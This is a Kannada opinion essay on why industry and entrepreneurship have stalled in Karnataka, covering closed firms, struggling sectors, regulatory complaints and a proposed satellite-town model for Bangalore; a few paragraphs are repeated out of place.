ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆಗೆ ಒದಗಿಬಂದಿರುವ ತೊಡಕುಗಳೇನು..?

ಚರ್ಚೆಯ ವಿಷಯವೊಂದು ಮುಕ್ತವಾಗಿರಬೇಕು ಹಾಗೂ ಪೂರ್ವ ನಿರ್ಧಾರಿತವಾಗಿರಬಾರದು ಎಂದು ನೀವು ಬಯಸಬಹುದು. ನಿಮ್ಮ ಬಯಕೆಯು ಸಹಜವೂ ಆಗಿದೆ. ಆದರೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶಿಲತೆಗೆ ತೊಂದರೆಗಳೇನು ಎಂದು ನಾವು ಚರ್ಚಿಸುವ ಕಾಲ ಮುಗಿದುಹೋಗಿದೆ. ಈ ವಿಷಯದಲ್ಲಿ ನಾವು ಮುಕ್ತ ಚರ್ಚೆಯನ್ನು ಬಯಸಿದರೆ ಬಾಲಿಶವಾಗಿಯೂ ಹಾಗೂ ಸ್ಪಂದನೆ ರಹಿತವಾಗಿಯೂ ಕಾಣುವ ಅಪಾಯವಿದೆ. ಕಳೆದ ಒಂದು ದಶಕದ ಹಲವಾರು ಘಟನೆಗಳು ಕರ್ನಾಟಕದ ಉದ್ಯಮಶೀಲತೆಗೆ ಅಗಾಧ ಧಕ್ಕೆ ಉಂಟುಮಾಡಿ ಇದೀಗ ಒದಗಿಬಂದಿರುವ ತೊಡಕುಗಳನ್ನು ಪಟ್ಟಿ ಮಾಡಬೇಕಾದ ಅನಿವಾರ್ಯ ಕಾರ್ಯಕ್ಕೆ ನಮ್ಮನ್ನು ದೂಡಿವೆ. ಕರ್ನಾಟಕದ ಯಾವುದೇ ಪಕ್ಷಗಳು ಹಾಗೂ ಸಂಘ-ಸಂಸ್ಥೆಗಳು ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಕ್ಕೆ ಹಾಗೂ ಕೈಗಾರಿಕೆಗೆ ಪೂರಕ ವಾತಾವರಣವಿದೆ ಎಂದು ಹೇಳಲಾಗದ ಪರಿಸ್ಥಿತಿಯೂ ಇದೆ.

• ಎರಡು ದಶಕಗಳ ಹಿಂದೆ ಕರ್ನಾಟಕಕ್ಕೆ ಬಂದಿಳಿದ ಟೊಯೊಟಾ ಕಂಪನಿಯ ನಂತರದಲ್ಲಿ ರೂ.1,000 ಕೋಟಿಗೂ ಹೆಚ್ಚು ಬಂಡವಾಳ ಹೂಡಿಕೆ ಮಾಡಿ ಪ್ರಾರಂಭಿಸಲಾದ ಯಾವುದೇ ಬೃಹತ್ ಕೈಗಾರಿಕೆ ಕರ್ನಾಟಕದಲ್ಲಿ ತಲೆಯೆತ್ತಿಲ್ಲ. ಅಂದರೆ ಕಳೆದ 20 ವರ್ಷಗಳಲ್ಲಿ ಉದ್ಯೋಗ ಸೃಷ್ಟಿಸಬಲ್ಲ ಯಾವುದೇ ಕೈಗಾರಿಕೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಶುರುವಾಗಿಲ್ಲ.

• ಇದೇ ಸಮಯದಲ್ಲಿ ಹಲವಾರು ಐಟಿ-ಬಿಟಿ-ಆನ್‍ಲೈನ್-ಸೇವಾಕ್ಷೇತ್ರದ ಉದ್ಯಮಗಳು ಪ್ರಾರಂಭವಾಗಿದ್ದರೂ ಇವು ಯಾವುದೇ ಮೂಲಸೌಲಭ್ಯ ಅಥವಾ ಕೈಗಾರಿಕೋತ್ಪನ್ನ ವೃದ್ಧಿಸುವ ಯಾಂತ್ರಿಕತೆ ಹೊಂದಿಲ್ಲ. ಕರ್ನಾಟಕದಲ್ಲಿ ಉತ್ಪನ್ನ ತಯಾರು ಮಾಡುವ ಕೈಗಾರಿಕೆಗಳು ಯಾವುದೂ ಹೊಸದಾಗಿ ಹುಟ್ಟಲಾರದ ಪರಿಸ್ಥಿತಿಯಿದೆ.

• ಇದೇ ಎರಡು ದಶಕಗಳಲ್ಲಿ ಉಳಿದ ಕೆಲವು ಕೈಗಾರಿಕೆಗಳೂ ಸತ್ತಿವೆ. ಮೊದಲು ಎನ್‍ಜಿಇಎಫ್, ಐಟಿಐ ಹಾಗೂ ಹೆಚ್‍ಎಂಟಿ ಮುಚ್ಚಿಹೋದರೆ ನಂತರದಲ್ಲಿ ಬಿಪಿಎಲ್, ಕಿಂಗ್‍ಫಿಶರ್, ಡೆಕ್ಕನ್ ಏವಿಯೇಶನ್, ಡೆಕ್ಕನ್ 360 ಗಳು ಮುಚ್ಚಿವೆ. ಸಣ್ಣ ಮತ್ತು ಮಧ್ಯಮ ಗಾತ್ರದ ಹಲವಾರು ಕೈಗಾರಿಕೆಗಳು ಕರ್ನಾಟಕದಿಂದ ನಿರ್ಗಮಿಸುವ ಸ್ಥಿತಿಯಲ್ಲಿವೆ.

ಅತ್ತ ರೈತರ ಬೆಂಬಲಬೆಲೆಯ ಬೇಡಿಕೆ ಈಡೇರಿಸಲಾಗದೆ ಹಾಗೂ ಇತ್ತ ಉತ್ಪಾದಿತ ಸರಕಿಗೆ ಲಾಭದಾಯಕ ಬೆಲೆ ಪಡೆಯಲಾಗದೆ ಈ ಸಕ್ಕರೆ ಕಾರ್ಖಾನೆಗಳು ಸೊರಗಿವೆ. ಆದರೆ ಈಗಾಗಲೇ ಹೂಡಿಕೆ ಮಾಡಿರುವ ಬಂಡವಾಳವನ್ನು ಹಿಂದಕ್ಕೆ ಪಡೆಯುವ ದಾರಿಕಾಣದೆ ಇವು ವರ್ಷದಿಂದ ವರ್ಷಕ್ಕೆ ಕುಂಟುತ್ತಿವೆ.

• ಕರ್ನಾಟಕದಲ್ಲಿ ಉಳಿದಿರುವ ಕೈಗಾರಿಕೋದ್ಯಮಗಳು ಬೇರೆಲ್ಲೂ ಹೋಗಲಾಗದೆ ಅನಿವಾರ್ಯವಾಗಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಉಳಿಯಬೇಕಾದ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿವೆ. ರೇಷ್ಮೆ ಉದ್ಯಮ, ಗಾರ್ಮೆಂಟ್ಸ್ ಉದ್ಯಮ ಹಾಗೂ ಕಲ್ಲು ಕತ್ತರಿಸಿ ಹೊಳಪುಗೈಯುವ ಕೈಗಾರಿಕೆಗಳು ಈಗಾಗಲೇ ತಾವು ಮಾಡಿರುವ ಹೂಡಿಕೆಯನ್ನು ಕಾಪಾಡಿಕೊಳ್ಳಲು ಕರ್ನಾಟಕದಲ್ಲಿ ಉಳಿದುಕೊಂಡಿವೆ. ಅವಕಾಶ ಸಿಕ್ಕಿದಲ್ಲಿ ಈ ಉದ್ಯಮಗಳು ರಾಜ್ಯದಿಂದ ಕಾಲುಕಿತ್ತು ನೀರು-ನೌಕರರು ಯಥೇಚ್ಛವಾಗಿ ದೊರಕುವ ಬೇರಾವುದೇ ರಾಜ್ಯಕ್ಕೆ ಹೋಗಲು ಸಿದ್ಧವಾಗಿವೆ.

• ಇವೆಲ್ಲಕ್ಕಿಂತ ಮುಖ್ಯವಾಗಿ ಕರ್ನಾಟಕದ ಹಲವಾರು ಉದ್ಯಮಗಳು ನಿರಂತರ ನಷ್ಟದಲ್ಲಿ ನಡೆಯುತ್ತಿವೆ. ಸಹಕಾರಿ ಹಾಗೂ ಖಾಸಗಿ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕರ್ನಾಟಕದ ಉದ್ದಗಲಗಳಲ್ಲಿ ಹರಡಿರುವ ಎಲ್ಲಾ ಸಕ್ಕರೆ ಕಾರ್ಖಾನೆಗಳು ನೆಲಕಚ್ಚಿವೆ. ಅಂತರರಾಷ್ಟ್ರೀಯ ಸಕ್ಕರೆ ಬೆಲೆ ಕುಸಿತ ಹಾಗೂ ಬೇಡಿಕೆ ತಗ್ಗಿದ ಪರಿಣಾಮದಲ್ಲಿ ಈ ಕಾರ್ಖಾನೆಗಳಿಗೆ ಬೀಗ ಜಡಿಯಬೇಕಾದ ಪರಿಸ್ಥಿತಿ ಬಂದಿದೆ. ಅತ್ತ ರೈತರ ಬೆಂಬಲಬೆಲೆಯ ಬೇಡಿಕೆ ಈಡೇರಿಸಲಾಗದೆ ಹಾಗೂ ಇತ್ತ ಉತ್ಪಾದಿತ ಸರಕಿಗೆ ಲಾಭದಾಯಕ ಬೆಲೆ ಪಡೆಯಲಾಗದೆ ಈ ಸಕ್ಕರೆ ಕಾರ್ಖಾನೆಗಳು ಸೊರಗಿವೆ. ಆದರೆ ಈಗಾಗಲೇ ಹೂಡಿಕೆ ಮಾಡಿರುವ ಬಂಡವಾಳವನ್ನು ಹಿಂದಕ್ಕೆ ಪಡೆಯುವ ದಾರಿಕಾಣದೆ ಇವು ವರ್ಷದಿಂದ ವರ್ಷಕ್ಕೆ ಕುಂಟುತ್ತಿವೆ. ರಾಜ್ಯದ ಉಕ್ಕು ಕಾರ್ಖಾನೆಗಳೂ ಬೇಡಿಕೆ ತಗ್ಗಿದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಮುಗ್ಗರಿಸಿದೆ. ಕಟ್ಟಡ ನಿರ್ಮಾಣ ಕಾರ್ಯವೂ ಕುಸಿಯುತ್ತಿರುವ ಸಂದರ್ಭದಲ್ಲಿ ಉಕ್ಕಿನ ಪದಾರ್ಥಗಳಿಗೆ ಇರಬೇಕಾದ ದೇಶಿ ಬೇಡಿಕೆಯೂ ಇಲ್ಲವಾಗಿದೆ. ಮೋಟಾರು ವಾಹನಗಳ ಬಿಡಿಭಾಗಗಳ ತಯಾರಿಕೆಯೂ ಕುಗ್ಗಿದೆ. ದೇಶದ ಒಟ್ಟು ಬೇಡಿಕೆ ಕುಸಿದು ತಯಾರಿಸಿದ ಮೋಟಾರು ವಾಹನಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಮಾರಲಾಗುತ್ತಿದೆ.

• ದಶಕದ ಹಿಂದೆ ರಾಜ್ಯದಲ್ಲಿ ಅವ್ಯಾಹತವಾಗಿ ನಡೆಯುತ್ತಿದ್ದ ಗಣಿಗಾರಿಕೆ ಇಂದು ನಿಂತಿದೆ. ಕಾನೂನುಬದ್ಧವೋ ಅಥವಾ ಕಾನೂನುಬಾಹಿರವೋ ಎಂಬ ವಿಂಗಡಣೆ ಸುಲಭಸಾಧ್ಯವಾಗದ ಪರಿಸ್ಥಿತಿಯಲ್ಲಿ ನ್ಯಾಯಾಲಯಗಳು ಎಲ್ಲಾ ಗಣಿಗಾರಿಕೆಯು ಕಾನೂನು ವಿರುದ್ಧವೆಂದೇ ತೀರ್ಮಾನಿಸಿ ಗಣಿಗಾರಿಕೆಯ ಚಕ್ರದ ಗಾಳಿಯನ್ನೇ ತೆಗೆದುಬಿಟ್ಟಿವೆ. ಸೂಕ್ತ ಮಾರ್ಗದರ್ಶಿ ಮಾನದಂಡಗಳಿಲ್ಲದೆ ಕಾನೂನುಬದ್ಧವಾಗಿ ನಡೆಸಲಾಗುತ್ತಿದ್ದ ಗಣಿಗಳೂ ಸರ್ಕಾರ-ನ್ಯಾಯಾಲಯಗಳ ಅವಕೃಪೆಗೆ ಒಳಗಾಗಿವೆ.

ಸಣ್ಣ ಕೈಗಾರಿಕೆ ಹಾಗೂ ಹೊಟೆಲ್ ಉದ್ಯಮದಲ್ಲಿ ಈ ಎರಡೂ ಸಮುದಾಯಗಳು ಅತ್ಯಂತ ಯಶಸ್ಸು ಕಂಡಿದ್ದವು. ದಕ್ಷಿಣ ಭಾರತದಾದ್ಯಂತ ಹಾಗೂ ಮುಂಬೈ-ಗುಜರಾತ್ ಪ್ರಾಂತ್ಯಗಳಲ್ಲಿ ಹೊಟೆಲ್ ಉದ್ಯಮದ ಮೇಲೆ ಪ್ರಬಲ ಹಿಡಿತ ಸಾಧಿಸಿದ್ದರು. ಹಿಂಜರಿಕೆಯಿಲ್ಲದೆ ಅವಕಾಶ ಬಳಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ಈ ಸಮುದಾಯದ ಜನರು ಸಿದ್ಧಹಸ್ತರಾಗಿದ್ದರು.

• ಮೊದಲಿನಿಂದಲೂ ಕಿರು-ವಿದ್ಯುತ್ ಯೋಜನೆಗಳಿಗೆ ಹೆಸರುವಾಸಿಯಾಗಿದ್ದ ಕರ್ನಾಟಕದಲ್ಲಿ ಸರ್ಕಾರದ ನಿಯಂತ್ರಣ ಮಂಡಳಿಗಳ ಅವಾಂತರದಲ್ಲಿ ಹಲವಾರು ಕಿರುವಿದ್ಯುತ್ ಯೋಜನೆಗಳು ಮುಚ್ಚುತ್ತಿವೆ. ಕೆಇಆರ್‍ಸಿ ಎಂಬ ಅವಿವೇಕಿ ಸಂಸ್ಥೆಯ ಕಿರುಕುಳದಲ್ಲಿ ಕರ್ನಾಟಕದ ಕಿರು ಜಲ-ವಿದ್ಯುತ್, ಸೌರ-ವಿದ್ಯುತ್ ಹಾಗೂ ಪವನ-ವಿದ್ಯುತ್ ಸಂಸ್ಥೆಗಳು ಮುಚ್ಚುತ್ತಿವೆ. ಫಸ್ರ್ಟ್ ಕಮ್ ಫಸ್ರ್ಟ್ ಸರ್ವ್, ರಿವರ್ಸ್ ಬಿಡ್ಡಿಂಗ್, ಪದೇಪದೇ ಬದಲಾಯಿಸಲಾಗುವ ದರಗಳು ಹಾಗೂ ಸುಲಭವಾಗಿ ದಕ್ಕದ ಪರವಾನಗಿಗಳ ಕಾರಣದಿಂದ ಈ ಯೋಜನೆಗಳು ತಾವು ಕರ್ನಾಟಕಕ್ಕೆ ಏಕಾದರೂ ಬಂದೆವೋ ಎಂದು ಹಣೆಹಣೆ ಚಚ್ಚಿಕೊಳ್ಳುತ್ತಿವೆ. ರಾಜ್ಯದ ಹಲವು ಪಕ್ಷಗಳ ವಿದ್ಯುತ್ ಖಾತೆ ಸಚಿವರ ದುಡ್ಡಿನ ದಾಹ ಪರಿಹರಿಸಲಾಗದೆ ಈ ಕಂಪನಿಗಳು ಹಳಹಳಿಸುತ್ತಿವೆ.

ಉದ್ಯಮಶೀಲತೆ ಕರ್ನಾಟಕಕ್ಕೆ ಹೊರಗಿನಿಂದ ಬರಬೇಕಾದ ಪ್ರಮೇಯವಿರಲಿಲ್ಲ. ನಮ್ಮ ಮಂಗಳೂರು ಭಾಗದ ಜಿಎಸ್‍ಬಿ ಸಮುದಾಯದ ಹಲವರು ಮೊದಲಿನಿಂದಲೂ ಉದ್ಯಮದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಂಡಿದ್ದರು. ಬೀಡಿ ಉದ್ಯಮ, ಬ್ಯಾಂಕಿಂಗ್ ಹಾಗೂ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಮುನ್ನಡೆ ಸಾಧಿಸಿದ್ದರು. ಎಪ್ಪತ್ತರ ನಂತರದ ದಶಕಗಳಲ್ಲಿ ವೈವಿಧ್ಯ ಕಾಣಲಾಗದಿದ್ದರೂ ಈ ಸಮುದಾಯದ ಸಾಧನೆ ಮಂಗಳೂರಿನ ಬಂಟ-ಬಿಲ್ಲವರಿಗೆ ಆದರ್ಶ ಪ್ರಾಯವಾಗಿತ್ತು. ಸಣ್ಣ ಕೈಗಾರಿಕೆ ಹಾಗೂ ಹೊಟೆಲ್ ಉದ್ಯಮದಲ್ಲಿ ಈ ಎರಡೂ ಸಮುದಾಯಗಳು ಅತ್ಯಂತ ಯಶಸ್ಸು ಕಂಡಿದ್ದವು. ದಕ್ಷಿಣ ಭಾರತದಾದ್ಯಂತ ಹಾಗೂ ಮುಂಬೈ-ಗುಜರಾತ್ ಪ್ರಾಂತ್ಯಗಳಲ್ಲಿ ಹೊಟೆಲ್ ಉದ್ಯಮದ ಮೇಲೆ ಪ್ರಬಲ ಹಿಡಿತ ಸಾಧಿಸಿದ್ದರು. ಹಿಂಜರಿಕೆಯಿಲ್ಲದೆ ಅವಕಾಶ ಬಳಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ಈ ಸಮುದಾಯದ ಜನರು ಸಿದ್ಧಹಸ್ತರಾಗಿದ್ದರು.

ಇದೇ ಸಮಯದಲ್ಲಿ ಕರ್ನಾಟಕದ ಹಲವು ಸರ್ಕಾರಿ ಸ್ವಾಮ್ಯದ ಉದ್ಯಮಗಳು ತಕ್ಕಮಟ್ಟಿಗೆ ಯಶಸ್ಸು ಗಳಿಸಲಾರಂಭಿಸಿದ್ದವು. ವಿಐಎಸ್‍ಎಲ್, ಕೆಐಸಿಓಎಲ್, ಕವಿಕಾ, ಕರ್ನಾಟಕ ಮಾರ್ಜಕ ಮತ್ತು ಸಾಬೂನು, ಮೈಸೂರು ಲ್ಯಾಂಪ್ಸ್ ಮತ್ತಿತರ ಸಂಸ್ಥೆಗಳು ತಮ್ಮ ಸ್ಥಳೀಯ ಉದ್ಯೋಗಿಗಳಿಗೆ ಉದ್ಯಮಶೀಲತೆಯ ಪರಿಚಯ ಮಾಡಿಕೊಟ್ಟಿದ್ದವು. ಐವತ್ತು ಅರವತ್ತರ ದಶಕಗಳಲ್ಲಿ ಪ್ರಾರಂಭಿಸಲಾದ ಬಿಇಎಲ್, ಬಿಹೆಚ್‍ಇಎಲ್, ಹೆಚ್‍ಎಎಲ್, ಡಿಆರ್‍ಡಿಓ, ಎಡಿಎಲ್ ಮತ್ತಿತರ ಸಂಸ್ಥೆಗಳು ಕೂಡಾ ಬೆಂಗಳೂರಿನಲ್ಲಿ ತಮ್ಮ ಉದ್ಯಮದ ಛಾಪು ಮೂಡಲಾರಂಭಿಸಿದ್ದವು.

ಮೊದಲಿಗೆ ಟಿವಿಎಸ್, ಟಾಟಾ ಘಟಕಗಳು ಹಾಗೂ ನಂತರದಲ್ಲಿ ಟೊಯೊಟಾ, ಹೊಂಡಾ, ಎಜಾಕ್ಸ್ ಫಿಯೊರಿ ಮತ್ತಿತರ ಕಂಪನಿಗಳು ಬೆಂಗಳೂರಿನ ಸುತ್ತ ತಲೆಯೆತ್ತಿದವು. 2000 ಇಸವಿಯವರೆಗೆ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಉದ್ಯಮಪೂರಕ ವಾತಾವರಣ ಸೃಷ್ಟಿಯಾಗಿತ್ತು.

ಬೇರಾವುದೇ ನಗರಗಳಲ್ಲಿ ಸಿಗಲಾಗದ ಪ್ರತಿಭೆಗಳು ಕರ್ನಾಟಕದ ರಾಜಧಾನಿಯಲ್ಲಿ ಹೇರಳವಾಗಿ ಸಿಗಲಾರಂಭಿಸಿದ್ದವು. ಅಂದಿನ ಖ್ಯಾತ ಎಲೆಕ್ಟ್ರಿಕಲ್ ಎಂಜಿನಿಯರ್‍ಗಳು ನಂತರದಲ್ಲಿ ತಮ್ಮ ಕ್ಷೇತ್ರ ಬದಲಾಯಿಸಿ ಕ್ರಮೇಣ ಎಲೆಕ್ಟ್ರಾನಿಕ್ಸ್ ಹಾಗೂ ಕಂಪ್ಯೂಟರ್ ವಿಜ್ಞಾನ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳಲು ನಿರ್ಧರಿಸಿದ್ದರು. ಈ ಸರ್ಕಾರಿ ಸಂಸ್ಥೆಗಳಿಂದ ಸರ್ಕಾರದ ಖಜಾನೆಗೆ ಸಂದಾಯವಾದ ಲಾಭದ ಪ್ರಮಾಣ ಕಡಿಮೆಯೇ ಆದರೂ ಈ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡಿದ ಸಹಸ್ರಾರು ಉದ್ಯೋಗಿಗಳು ಮತ್ತವರ ಮಕ್ಕಳು ಮುಂದಿನ ದಶಕಗಳಲ್ಲಿ ಸ್ವಂತ ಉದ್ದಿಮೆ ಮಾಡುವ ಸಾಮಥ್ರ್ಯ ಹಾಗೂ ಅಭಿರುಚಿ ಹೊಂದಿದವರಾಗಿದ್ದರು.

ಈ ಮಧ್ಯೆ ಹಲವಾರು ವಾಹನ ತಯಾರಿಕಾ ಘಟಕಗಳು ಬೆಂಗಳೂರಿನ ಪರಿಸರದಲ್ಲಿ ತಲೆಯೆತ್ತಿದವು. ಮೊದಲಿಗೆ ಟಿವಿಎಸ್, ಟಾಟಾ ಘಟಕಗಳು ಹಾಗೂ ನಂತರದಲ್ಲಿ ಟೊಯೊಟಾ, ಹೊಂಡಾ, ಎಜಾಕ್ಸ್ ಫಿಯೊರಿ ಮತ್ತಿತರ ಕಂಪನಿಗಳು ಬೆಂಗಳೂರಿನ ಸುತ್ತ ತಲೆಯೆತ್ತಿದವು. 2000 ಇಸವಿಯವರೆಗೆ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಉದ್ಯಮಪೂರಕ ವಾತಾವರಣ ಸೃಷ್ಟಿಯಾಗಿತ್ತು.

ಬೆಂಗಳೂರು ಸುತ್ತಮುತ್ತಲ ಪ್ರದೇಶ ನ್ಯೂಯಾರ್ಕ್-ನ್ಯೂಜೆರ್ಸಿ ಆಗುವ ಅವಕಾಶ

ಜಗತ್ತಿನ ಎಲ್ಲಾ ಬೃಹತ್ ಕಂಪನಿಗಳು ಬೆಂಗಳೂರಿನಲ್ಲಿ ತಮ್ಮ ಪಾದ ಊರಲು ತುದಿಗಾಲಲ್ಲಿ ನಿಂತಿವೆ. ಈ ಕಂಪನಿಗಳು ಬೆಂಗಳೂರಿನಲ್ಲಿ ಟೆಕ್ ಶಾಖೆಯೊಂದನ್ನೋ, ಸಂಶೋಧನಾ ಕೇಂದ್ರವೊಂದನ್ನೋ ಅಥವಾ ಆನ್‍ಲೈನ್ ಹಿಂಬದಿ ಕಛೇರಿಯೊಂದನ್ನೋ ತೆರೆಯುವ ಬಯಕೆಯಲ್ಲಿವೆ. ಯಾವುದೇ ದೇಶದ ಯಾವುದೇ ನಗರಕ್ಕೆ ಸುಲಭಕ್ಕೆ ದಕ್ಕಲಾಗದ ಭಾಗ್ಯವಿದು. ಈ ಸುವರ್ಣ ಅವಕಾಶವನ್ನು ಉಪಯೋಗಿಸಿಕೊಂಡು ಜಾಗತಿಕ ಟೆಕ್ ರಾಜಧಾನಿಯಾಗುವ ಅವಕಾಶ ಬೆಂಗಳೂರಿಗಿದೆ.

ಆದರೆ ಇದಕ್ಕೆ ಮೂಲಭೂತ ಸೌಲಭ್ಯಗಳ ಕೊರತೆ ಅಡ್ಡಬರಬಹುದು. ಇದನ್ನು ನಿವಾರಿಸಲು ಬೆಂಗಳೂರು ನ್ಯೂಯಾರ್ಕ್-ನ್ಯೂಜೆರ್ಸಿ ಮಾದರಿ ಅನುಸರಿಸಬಹುದು. ಏನಿದು ‘ನ್ಯೂ’ ಮಾದರಿ..?

ನ್ಯೂಯಾರ್ಕ್ ಪ್ರಪಂಚದ ಹಣಕಾಸಿನ ಕೇಂದ್ರಬಿಂದು. ಇಡೀ ಜಗತ್ತಿನ ಬಾಂಡ್ ಮಾರುಕಟ್ಟೆ, ಶೇರು ಮಾರುಕಟ್ಟೆ, ಪದಾರ್ಥಗಳ ಮಾರುಕಟ್ಟೆ ಹಾಗೂ ಸಾಲ-ಹೂಡಿಕೆಗಳ ಮಾರುಕಟ್ಟೆ ಇಲ್ಲಿದೆ. ಜೊತೆಗೆ ಇದು ಅತ್ಯುತ್ತಮ ಶೈಕ್ಷಣಿಕ, ವೈದ್ಯಕೀಯ ಹಾಗೂ ಮನರಂಜನೆಯ ತಾಣ ಕೂಡ. ನ್ಯೂಯಾರ್ಕ್‍ನಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ ಲಕ್ಷಾಂತರ ಮಂದಿ ನ್ಯೂಯಾರ್ಕ್‍ನಲ್ಲಿ ನೆಲೆಸಿಲ್ಲ. ಪಕ್ಕದ ನ್ಯೂಜೆರ್ಸಿ, ಕ್ವೀನ್ಸ್, ಬ್ರಾಂಕ್ಸ್ ಪ್ರದೇಶಗಳಲ್ಲಿ ವಾಸಿಸುತ್ತಾರೆ. ಬೆಳಿಗ್ಗೆ ರೈಲುಗಾಡಿ ಹಿಡಿದು ನ್ಯೂಯಾರ್ಕ್‍ಗೆ ಬಂದ ಜನ ಸಂಜೆ ಅದೇ ಫಾಸ್ಟ್ ರೈಲುಗಾಡಿ ಹಿಡಿದು ತಮ್ಮ ಮನೆಗಳಿಗೆ ತೆರಳುತ್ತಾರೆ. ನ್ಯೂಯಾರ್ಕ್ ಬಹುತೇಕ ಕೆಲಸದ, ಕಛೇರಿಗಳ, ಮನರಂಜನೆ ತಾಣಗಳ, ಶೈಕ್ಷಣಿಕ ಸಂಸ್ಥೆಗಳ ಹಾಗು ಆಸ್ಪತ್ರೆಗಳ ನಗರವಾಗಿದೆ. ನ್ಯೂಯಾರ್ಕ್‍ನ ಮೇಲೆ ಹೊರೆ ಕಡಿಮೆಯಾಗಿದೆ.

ಇದೇ ಮಾದರಿಯಲ್ಲಿ ಬೆಂಗಳೂರಿನ ಸುತ್ತಲಿನ ಬೆಂಗಳೂರು ಗ್ರಾಮಾಂತರ, ಚಿಕ್ಕಬಳ್ಳಾಪುರ ಹಾಗೂ ರಾಮನಗರ ಜಿಲ್ಲೆಗಳನ್ನು ಬೆಂಗಳೂರಿಗೆ ಪೂರಕವಾಗಿ ಬೆಳೆಸಬಹುದು. ಈ ಎಲ್ಲಾ ಪ್ರದೇಶಗಳಲ್ಲಿ ನವನವೀನ ಪಟ್ಟಣ ಹಾಗೂ ವಸಾಹತು ಬಡವಣೆಗಳನ್ನು ನಿರ್ಮಿಸಿ ಈಗಿನ ಬೆಂಗಳೂರು ಸರಹದ್ದಿನಲ್ಲಿ ಕಛೇರಿ-ಸಂಸ್ಥೆಗಳನ್ನು ತೆರೆಯಬಹುದು. ನಿಜವಾಗಿಯೂ ಜಾಗತಿಕ ನಗರವೊಂದನ್ನು ಕಟ್ಟುವ ಅಪೂರ್ವ ಅವಕಾಶವನ್ನು ಬಳಸಿಕೊಳ್ಳಬಹುದು.
ಹೌದು. ಆದರೆ ನಮಗಿದೆಯೇ ಇಚ್ಛಾಶಕ್ತಿ..?

90ರ ದಶಕ ಮತ್ತು ಮುಂದಿನ ಎರಡು ದಶಕಗಳಲ್ಲಿ ಬೆಂಗಳೂರಿನ ಉದ್ಯಮಶೀಲತೆಯ ನಕ್ಷೆ ಸಂಪೂರ್ಣ ಬದಲಾಗತೊಡಗಿತು. ಇನ್‍ಫೋಸಿಸ್ ಹಾಗೂ ವಿಪ್ರೊ ಕಂಪನಿಗಳು ಕ್ಷಿಪ್ರ ಪ್ರಗತಿಯ ದಾಪುಗಾಲು ಹಾಕಲಾರಂಭಿಸಿದ್ದವು. ಈ ಕಂಪನಿಗಳ ಮುನ್ನಡೆಯಲ್ಲಿ ಐಗೇಟ್, ಮೈಂಡ್‍ಟ್ರೀ, ಕ್ಷೇಮ ಮತ್ತಿತರ ಹಲವಾರು ದೇಶಿ ಟೆಕ್ ಸೇವಾ ಕಂಪನಿಗಳು ಹಾಗೂ ಫಾರ್ಚೂನ್-500 ಪಟ್ಟಿಯ ಬಹುತೇಕ ಕಂಪನಿಗಳು ಬೆಂಗಳೂರಿನಲ್ಲಿ ತಮ್ಮ ಟೆಕ್-ಶಾಖೆ ಆರಂಭಿಸಿದವು. ಉದ್ಯಮದ ಯಾವುದೇ ವಲಯವಾದರೂ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಒಂದು ಆಫ್‍ಶೋರ್ (ಸಾಗರೋತ್ತರ) ತಂತ್ರಜ್ಞಾನ ಶಾಖೆ ತೆರೆಯುವುದು ಕಡ್ಡಾಯವಾಗತೊಡಗಿತು.

ಮೊದಲ ಕೆಲವು ವರ್ಷಗಳಲ್ಲಿ ಬೆಂಗಳೂರಿಗೆ ಚೆನ್ನೈ ಮತ್ತು ಹೈದರಾಬಾದು ಪೈಪೋಟಿ ನೀಡಲು ಪ್ರಯತ್ನಿಸಿದರೂ ನಂತರದ ವರ್ಷಗಳಲ್ಲಿ ಬೆಂಗಳೂರಿನ ಏಕಸ್ವಾಮ್ಯ ಮತ್ತೆ ಪ್ರತಿಷ್ಠಾಪನೆಗೊಂಡಿತು. ಮೈಕ್ರೋಸಾಫ್ಟ್ ಮತ್ತು ಗೂಗಲ್ ಕಂಪನಿಗಳು ಹೈದರಾಬಾದಿನಲ್ಲಿ ಉಳಿದುಕೊಂಡರೂ, ಟಿಸಿಎಸ್ ಮುಂಬೈನಲ್ಲಿಯೇ ಉಳಿದರೂ ಬೇರೆಲ್ಲಾ ಕಂಪನಿಗಳು ಅನಿವಾರ್ಯವಾಗಿ ಬೆಂಗಳೂರಿನಲ್ಲಿಯೇ ತಮ್ಮ ಕೇಂದ್ರನೆಲೆ ಕಂಡುಕೊಳ್ಳಬೇಕಾಯಿತು. 2002 ರಿಂದ 2012 ರವರೆಗೆ ನಡೆದ ಈ ಟೆಕ್ ವಿಸ್ತರಣೆಯಲ್ಲಿ ಬೆಂಗಳೂರಿನ ಮೂಲಭೂತ ಸೌಕರ್ಯ ಇನ್ನಿಲ್ಲದಷ್ಟು ಪರೀಕ್ಷೆಗೆ ಒಳಪಟ್ಟಿತು.

